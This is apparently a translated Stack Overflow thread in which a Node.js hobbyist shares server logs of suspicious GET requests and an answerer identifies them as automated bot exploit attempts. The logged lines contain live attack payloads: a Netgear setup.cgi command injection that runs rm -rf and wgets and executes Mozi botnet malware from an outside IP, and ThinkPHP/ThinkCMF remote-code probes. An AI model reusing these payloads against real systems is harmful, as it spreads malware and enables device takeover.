开始了我自己的 node.js Web 服务器项目 - 这些 GET 请求是什么？答案

【问题标题】：Started my own node.js web server project - what are these GET requests?开始了我自己的 node.js Web 服务器项目 - 这些 GET 请求是什么？
【发布时间】：2023-08-21 07:51:01
【问题描述】：

我最近设置了一个家庭网络服务器来运行我的 node.js 和 express 网络应用程序（使用 Raspberry Pi，基本上是为了弄清楚如何去做）。

在我的域上激活它后不久（几小时），我记录了以下 GET 请求：

0|app.js   | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://218.77.224.248:55400/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 404 23.779 ms - 922
0|app.js   | GET /solr/admin/info/system?wt=json 404 25.780 ms - 922
0|app.js   | GET /?XDEBUG_SESSION_START=phpstorm 200 24.322 ms - 170
0|app.js   | GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 200 21.867 ms - 170
0|app.js   | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP 404 25.449 ms - 922

我的服务器受到攻击了吗？

如果是这样，攻击者是如何针对我的？

如何防止攻击并获得良好的安全性？

还是我读错了？

谢谢

【问题讨论】：

标签： node.js express get webserver

【解决方案1】：

你被攻击了……但你很好，因为这些攻击不会影响 Node.JS。 https://forum.codeigniter.com/thread-75932.html

这些攻击可能只是自动攻击（因为它们只是向您的网络服务器抛出随机漏洞利用），而攻击者可能是一个机器人，被编程为向网络服务器抛出常见漏洞。

不过，关于拥有良好的安全性……这是一件很难做到的事情。我建议你从 Express 文档开始here，然后上网看看会出现什么结果。

【讨论】：